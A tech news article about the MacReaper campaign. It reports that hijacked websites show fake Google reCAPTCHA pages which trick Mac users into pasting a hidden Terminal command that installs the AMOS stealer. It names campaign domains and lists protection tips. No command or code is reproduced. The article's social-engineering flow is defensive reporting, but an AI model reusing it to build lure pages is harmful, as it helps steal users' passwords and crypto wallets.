The Article Tells The Story of:
- 2,800 Trusted Sites Now Deliver Malware to Macs: Hackers hijacked real websites to silently redirect users into a malware trap disguised as a simple reCAPTCHA.
- One Click Gives Hackers Full Access: A fake CAPTCHA tricks users into pasting a hidden command that installs AMOS malware—stealing passwords, documents, and crypto.
- Mac Users Are the Only Target: This attack activates only on macOS, slipping past antivirus tools by using visual tricks and user action instead of obvious threats.
- Hackers Are Selling AMOS on Telegram: Cybercriminals rent this powerful spyware for up to $3,000 a month, fueling a growing campaign to hijack Apple devices.
AMOS Malware Campaign Targets Mac Users Through Fake reCAPTCHA
Cybercriminals are shifting tactics. Email attachments and fake invoices are losing their edge, as users grow smarter and email systems get better at blocking threats. Now, hackers are exploiting something users often trust: Google’s reCAPTCHA.
A new campaign named MacReaper is using over 2,800 legitimate websites to spread Atomic macOS Stealer (AMOS) malware. This attack uses a fake Google reCAPTCHA to trick Mac users into copying and pasting malicious commands. Once run, the command installs AMOS, a powerful malware designed to steal sensitive data from macOS systems.
The attack only triggers on Apple devices. If the system detects Windows or Linux, the site shows normal content. The campaign’s goal is clear: trick Mac users with a simple action that leads to a full system compromise.
Read More About Our Article of Developer Faces 10 Years in Prison for Installing a Kill Switch at Former Job Published on March 16, 2025 SquaredTech
How MacReaper Delivers AMOS to Apple Devices
The process begins when a Mac user lands on one of the compromised websites. Instead of the expected content, the site displays a full-screen replica of Google’s reCAPTCHA. It prompts the user to click a checkbox labeled “I’m not a robot.”
Once the user clicks, a hidden command is silently copied to the clipboard. The site then shows another screen, styled like macOS system dialogs, telling the user to open the Terminal and paste the copied content.
If the user follows this prompt, they unknowingly download and run the AMOS malware.
This method, nicknamed ClickFix by researchers, relies on user trust and habit. The malware’s delivery process blends visual trickery with subtle instructions, making it highly effective. It doesn’t exploit a system vulnerability—it exploits user behavior.
AMOS is no small threat. It’s sold on Telegram for up to $3,000 per month. Once installed, it can:
- Steal saved Wi-Fi and app passwords from Keychain.
- Grab cookies and autofill data from browsers.
- Scan files in the user’s Desktop and Documents folders.
- Target over 50 types of cryptocurrency wallets.
Because users themselves activate the malware, security tools often fail to flag it. The infection looks like regular user activity.
Domains Used to Spread AMOS Malware
Security researchers have traced the MacReaper campaign to several known domains. These include:
- technavix.cloud
- salorttactical.top
- agencia2.jornalfloripa.com.br (a Brazilian news site initially used to launch the operation)
From this starting point, the malware campaign quickly scaled to affect over 2,800 legitimate websites across multiple regions. The hackers repurposed trusted sites to redirect users into their trap.
This wide-scale abuse of legitimate web domains makes the campaign harder to detect and block. It also increases the odds of users stumbling across an infected site during normal browsing.
How to Protect Yourself from AMOS and Fake reCAPTCHA Attacks
The MacReaper attack is a clear reminder that no system is safe from malware. Mac users must treat social engineering threats as seriously as traditional exploits. Here are six key steps to stay protected:
1. Ignore CAPTCHA Requests That Involve Terminal Use
Legitimate CAPTCHA systems never ask you to copy and paste commands. If a website tells you to open Terminal and run something, close the page immediately. It’s almost certainly a scam.
2. Avoid Clicking Suspicious Links and Use Antivirus Protection
Many infections start with phishing emails pretending to be from real companies. Don’t click links in emails you weren’t expecting. Visit websites directly by typing the URL yourself.
Install antivirus software on all devices. Good antivirus tools can block malware, flag phishing sites, and scan downloads before they run. Strong protection on both Windows and Mac is no longer optional.
3. Enable Two-Factor Authentication
Use two-factor authentication (2FA) for all accounts. This adds another step for attackers trying to break into your services, even if they steal your password.
4. Keep All Devices and Software Updated
Always update your operating system, browsers, and antivirus tools. Turn on automatic updates where possible. Many attacks exploit outdated software with known flaws.
5. Watch for Unusual Account Activity
If you suspect you’ve clicked on a bad link or visited a fake site, check your online accounts for strange behavior. Look for:
- New logins from unknown locations.
- Password reset requests.
- Unexplained financial activity.
If anything looks off, change your passwords immediately. A password manager can help you generate and store strong, unique passwords.
6. Use Personal Data Removal Services
Some services monitor your personal data and alert you if it appears in leaks or public databases. These tools help track if your identity is being misused after a malware infection. While they can’t delete all your data, they help reduce exposure by automating takedown requests across multiple platforms.
MacReaper Proves macOS Is Not Immune to Malware
The MacReaper campaign reveals a growing issue: many users believe Macs are immune to cyberattacks. This belief is false. macOS offers some built-in protections, but it does not stop all threats. Especially not threats that rely on social engineering instead of system exploits.
Hackers are now using design tricks and human psychology. A user who clicks a checkbox and follows instructions is unknowingly giving malware permission to run.
AMOS uses this method to steal browser data, documents, and even cryptocurrency. Since Macs often share identity systems with Windows devices on enterprise networks, a single infected Mac can lead to wider breaches across cloud storage, single sign-on portals, and internal company tools.
Final Thoughts: Trust Is the Weak Point
The AMOS malware campaign shows that the biggest weakness is trust. A fake reCAPTCHA, a familiar macOS prompt, and a helpful-looking instruction can trick even cautious users.
Apple continues to roll out technical protections like Rapid Security Response and app notarization. But users must also build healthy habits: pause before clicking, question unexpected prompts, and treat every web interaction with caution.
Security is now a shared responsibility. Whether you’re using Windows or macOS, antivirus tools, strong passwords, updates, and skepticism are your best defense.
Do you think companies are doing enough to stop malware like AMOS? Let us know.
Stay Updated: Tech News
